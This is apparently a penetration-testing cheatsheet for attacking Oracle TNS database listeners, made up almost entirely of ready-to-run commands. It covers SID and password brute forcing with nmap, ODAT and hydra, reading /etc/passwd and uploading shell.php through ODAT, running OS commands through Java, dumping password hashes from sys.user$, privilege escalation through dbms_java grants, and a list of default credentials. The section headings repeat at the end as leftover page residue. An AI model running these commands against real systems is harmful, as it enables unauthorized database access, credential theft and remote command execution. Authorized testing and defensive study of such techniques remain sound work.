Oracle TNS Enumeration Cheatsheet

Default Port: 1521 (TCP)

Nmap Scripts

nmap -p 1521 --script oracle-tns-version <ip>
nmap -p 1521 --script oracle-sid-brute <ip>
nmap -p 1521 --script oracle-brute <ip>
nmap -p 1521 --script oracle-brute-stealth <ip>
nmap -p 1521 --script oracle-enum-users \
  --script-args oracle-enum-users.sid=<sid> <ip>

ODAT (Oracle Database Attacking Tool)

# Full automated scan
odat all -s <ip> -p 1521

# SID brute force
odat sidguesser -s <ip> -p 1521

# Password brute force (after getting SID)
odat passwordguesser -s <ip> -p 1521 -d <sid>

# File read/write (requires UTL_FILE privilege)
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php

# OS command execution (requires Java)
odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami"

# External table method for file read
odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd

sqlplus (Direct Connection)

# Install: sudo apt install oracle-instantclient-sqlplus

# Connect
sqlplus <user>/<pass>@<ip>:<port>/<sid>
sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba
sqlplus <user>/<pass>@//<ip>:<port>/<service_name>

Common SIDs to Try

XE          ORCL        DB          DATABASE
PROD        TEST        DEV         ORACLE
OEMREP      ORACLR_CONNECTION_DATA

Enumeration Queries (Once Connected)

-- Version and user
SELECT * FROM v$version;
SELECT user FROM dual;
SELECT * FROM session_privs;

-- Database objects
SELECT * FROM all_tables;
SELECT owner, table_name FROM all_tables WHERE owner != 'SYS';
SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>';

-- Users and privileges
SELECT username FROM dba_users;
SELECT * FROM user_role_privs;
SELECT * FROM dba_sys_privs WHERE grantee = '<user>';

-- Password hashes (as SYSDBA)
SELECT name, password FROM sys.user$;
SELECT name, spare4 FROM sys.user$;    -- SHA-1 hashes (11g+)

-- Check for DBA role
SELECT * FROM session_privs WHERE privilege = 'CREATE SESSION';

Privilege Escalation via Java

-- Grant Java permissions (as DBA)
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

-- Execute OS command via Java
SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual;

Brute Force

hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid>
nmap -p 1521 --script oracle-brute \
  --script-args oracle-brute.sid=<sid> <ip>

Default Credentials

Username	Password	Notes
sys	change_on_install	sysdba
system	manager
scott	tiger	Classic demo user
dbsnmp	dbsnmp	SNMP agent
mdsys	mdsys
hr	hr

Oracle TNS Enumeration Cheatsheet#

Nmap Scripts#

ODAT (Oracle Database Attacking Tool)#

sqlplus (Direct Connection)#

Common SIDs to Try#

Enumeration Queries (Once Connected)#

Privilege Escalation via Java#

Brute Force#

Default Credentials#

Oracle TNS Enumeration Cheatsheet

Nmap Scripts

ODAT (Oracle Database Attacking Tool)

sqlplus (Direct Connection)

Common SIDs to Try

Enumeration Queries (Once Connected)

Privilege Escalation via Java

Brute Force

Default Credentials